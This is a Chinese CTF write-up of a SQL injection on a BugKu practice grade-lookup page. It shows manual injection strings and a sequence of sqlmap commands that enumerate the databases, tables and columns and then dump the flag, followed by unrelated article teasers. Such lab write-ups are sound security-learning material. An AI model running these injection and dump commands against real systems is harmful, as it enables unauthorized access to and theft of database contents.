BugKu Web滲透之成績查詢

打開網頁,頁面如下:

輸入框中輸入不同的數字可以查詢不同的結果。輸入1后點擊submit按鈕,下方出現成績結果。

從題目上看感覺是一個SQL注入的漏洞。

思路有下:

1.自己手動拼接一些常見的SQL注入。

2.用bp抓包后用SQLMap去跑。

首先,我自己嘗試了下手動拼接注入。有輸入1' or '1'='1? 或者 1' or 1=1# 等一些簡單的,但是沒有看見任何異常。于是手動注入失敗。

之后我用sqlmap去爆破。

步驟如下:

步驟一:

用burpsuite去抓包。查看請求方式為post傳參。如下圖所示,把紅框中的內容選擇后保存成一個txt文件。(注:post傳參最好是將請求的所有內容保存成一個txt,之后再用sqlmap去跑會比較方便。)

步驟二:

用sqlmap去爆破。

python sqlmap.py -r D:\path\postReq.txt

如下圖:

允許結束后,入下圖顯示。

紅框里顯示這,參數id是可以注入的。之后的紅框里顯示了數據庫以及網頁服務器的操作系統版本信息。

只要是可以注入的,就可以繼續進一步去爆破數據了。

步驟三:進一步爆破數據。

爆破數據庫:

python sqlmap.py -r D:\path\postReq.txt --dbs

爆破出以下幾個數據庫:

其中information_schema和mysql是系統自帶的數據庫。

skctf和test可能是真實使用的數據庫。在這里,看名稱,我覺得帶“ctf”幾個字母的更有可能。于是選擇skctf繼續爆破。

爆破表名:

python sqlmap.py -r D:\path\postReq.txt -D skctf --tables

結果如下:?

看表名,選擇 fl4g 的表繼續爆破。

爆破列名:

python sqlmap.py -r D:\path\postReq.txt -D skctf -T fl4g --columns

結果如下:

看列名,選擇skctf_flag繼續爆破。

爆破指定列名中的所有數據:

python sqlmap.py -r D:\path\postReq.txt -D skctf -T fl4g -C skctf_flag --dump

結果出現:

爆破成功!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/94800.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/94800.shtml
英文地址,請注明出處:http://en.pswp.cn/web/94800.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【MES】工業4.0智能制造數字化工廠(數字車間、MES、ERP)解決方案:智能工廠體系架構、系統集成以及智能設計、生產、管理、倉儲物流等

工業4.0智能制造數字化工廠的解決方案,涵蓋了智能制造的背景、企業實現智能工廠的好處、智能工廠的規劃與實現方法以及系統實施模塊的詳細介紹。通過上汽通用凱迪拉克工廠的案例展示了智能工廠的強大能力,強調了數據、技術、管理、人員等關鍵要素在智能制…

3.【鴻蒙應用開發實戰: 從入門到精通】開發入門 Hello World

1.【鴻蒙應用開發實戰: 從入門到精通】開發入門 Hello World1.1 前言1.2 創建一個新項目1.2.1 打開DevEco Studio1.2.2 點擊 Create Project 創建項目1.3 遺留問題1.4 總結與開發建議1.5 結束語1.1 前言 上篇博文【2.【鴻蒙應用開發實戰: 從入門到精通】開發環境搭建】我們已經…

mac系統本地部署Dify步驟梳理

更換終端,適配步驟梳理見筆記前提:已安裝docker desktop,若未安裝,跳轉至文末先安裝1.Git軟件準備(1)確認查詢Git版本(2)如果查詢不到系統會提示安裝,點擊安裝即可&#…

深度學習——基于卷積神經網絡實現食物圖像分類【1】(datalodar處理方法)

1. 項目概述 在這個項目中,我們將使用PyTorch框架構建一個卷積神經網絡(CNN)來實現食物圖像分類任務。我們的數據集包含20種不同的食物類別,包括八寶粥、巴旦木、白蘿卜、板栗等常見食物。本文將詳細介紹從數據準備、模型構建到訓練和評估的完整流程。 …

華中科大聯手小米推出ReCogDrive:自動駕駛迎來“認知革命”!

1.【前言】 在開放道路中實現安全、平穩、泛化的自動駕駛,是智能交通領域的“圣杯”。盡管近年來 端到端自動駕駛(End-to-End Autonomous Driving, E2E-AD) 框架(如 UniAD、VAD)在 NuScenes 等基準中展現出優異表現&a…

基于 Spring AMQP 的 RabbitMQ 分布式消息系統實戰

在分布式系統中,服務間的解耦與異步通信是關鍵挑戰。RabbitMQ 作為一款成熟的消息中間件,憑借其靈活的交換器模型(Direct/Fanout/Topic)、可靠的消息傳遞機制(持久化、確認機制)和豐富的客戶端支持&#xf…

計算機網絡:天氣預報

一、預期結果程序運行輸入所要查詢的地點,然后出現三個選項實時天氣、未來天氣、生活指數。二、實現思路(一)Ubuntu中利用NOWapi服務器獲取訪問數據api地址,然后創建客戶端利用TCP、IPV4協議分別訪問實時天氣,未來天氣…

GD32VW553-IOT OLED移植

1.前言 本來想用他自身的硬件I2C實現的,但是不知道為啥跑demo一點波形都沒有,改成推挽也沒有波形,只有初始化的電平變化,而且I2C的驅動庫好像有點復雜,起始信號結束信號都得單獨發的,沒有一個全部封裝好的庫…

刀客doc:Instagram會成為Meta廣告業務的第二曲線嗎?

文/刀客doc(頭條深一度精選作者)一如果現在還用“Facebook的小弟”來定義Instagram,多少顯得有些過時了。在和一些出海品牌負責人聊天時,我有個很明顯的感受:他們已經不會再把Instagram當成“附屬資源”去看待。到2025年第二季度,…

Python日期計算完全指南:從上周五到任意日期的高效計算

引言:日期計算的核心價值在業務系統開發中,日期計算是高頻且關鍵的需求。根據2024年企業系統調查報告:85%的財務系統需要計算上周五(工資結算日)78%的報表系統依賴周數據統計92%的供應鏈系統使用工作日計算65%的BI工具…

達夢數據庫-重做日志文件(一)

達夢數據庫-重做日志文件(redo)(一) 1.查看redo文件 SQL> select * from v$rlogfile;行號 GROUP_ID FILE_ID PATH CLIENT_PATH CREATE_TIME RLOG_SIZE MIN_EXEC_VER MIN_DCT_VER ---------- ----------…

STM32CubeMX 6.15.0 + CLion

-DCMAKE_TOOLCHAIN_FILE./cmake/gcc-arm-none-eabi.cmake 參考 Clion進行嵌入式開發生成.hex文件教程_clion hex-CSDN博客

redis添加超時設置

redis添加參數的超時設置, 并且需要加鎖,一開始是用redisTemplate.opsForValue().setIfAbsent("key","value",1,TimeUnit.SECONDS);結果發現這種方式直接會返回空指針錯誤所以只能對方法加鎖來解決加鎖和超時的問題import lombok.extern.slf4j.Slf4j; impo…

七牛云實踐:我們如何用 AIGC 將產品開發從“人想圖”變為“圖選圖”

在火熱進行中的2025深圳國際文創展上,AI玩具、數字藝術等新興品類無疑成為了焦點。表面的喧囂之下,一個更深層次的變革正在悄然發生:驅動這些創新產品誕生的底層工作流,正在被AIGC技術深刻影響。 對于身處其中的產品經理、設計師和…

醫療器械企業如何做好多系統權限管理?解析PLM、ERP、MES權限角色

在醫療器械這個高度專業化、強監管的行業,數字化轉型不僅意味著效率提升,更關乎合規與安全。當企業將業務流程從研發、生產、銷售到售后,逐步遷移到ERP、PLM、MES、CRM等各類數字系統中時,一個關鍵而又常常被忽視的問題浮出水面&a…

藍凌研究院《2025上市公司AI數智化轉型白皮書》發布

上市公司是國民經濟基本盤。目前中國境內上市公司達5420家,加上海外上市公司總數會更多。上市公司群體是國民經濟的基本盤,其發展態勢深刻映照著經濟轉型的脈搏與韌性。目前,中國在境內上市的公司總數達5420家,加上海外上市的公司…

OpenFOAM并行區域分解生成的polymesh文件解釋

文章目錄OpenFOAM里區域分解后polymesh文件解釋🔹 1. What is polyMesh?🔹 2. Domain Decomposition Overview🔹 3. How decomposePar Works with polyMeshKey Output Files in processorX/polyMesh/:🔹 4. Types of Decompositi…

前端-npm和yarn的安裝以及區別

目錄 一.安裝npm或yarn 安裝Yarn 🖥? macOS / Linux 方式 1:通過 npm 安裝(最簡單) 方式 2:通過系統包管理器 🪟 Windows 方法 1:用 npm 安裝 方法 2:用 MSI 安裝包 方法 3&#x…

通信原理實驗之線性均衡器-迫零算法

通信原理實驗之線性均衡器-迫零算法一、實驗目的1、了解線性均衡器;2、了解迫零算法;3、熟悉眼圖的使用。二、實驗儀器1、序列碼產生2、信號中繼器3、加多徑干擾4、迫零均衡5、信號分布圖 6、眼圖三、實驗的理論基礎1.線性均衡器:信道均衡技術…

把 AI 塞進「智能手環」——基于心率變異的零樣本壓力監測手環

標簽:心率變異、壓力監測、零樣本、智能手環、TinyML、RISC-V、低功耗、邊緣 AI ---- 1. 背景:為什么手環要「測壓力」? 現代生活壓力大,全球 30% 的人有焦慮癥狀,但傳統手環: ? 只能測心率,無…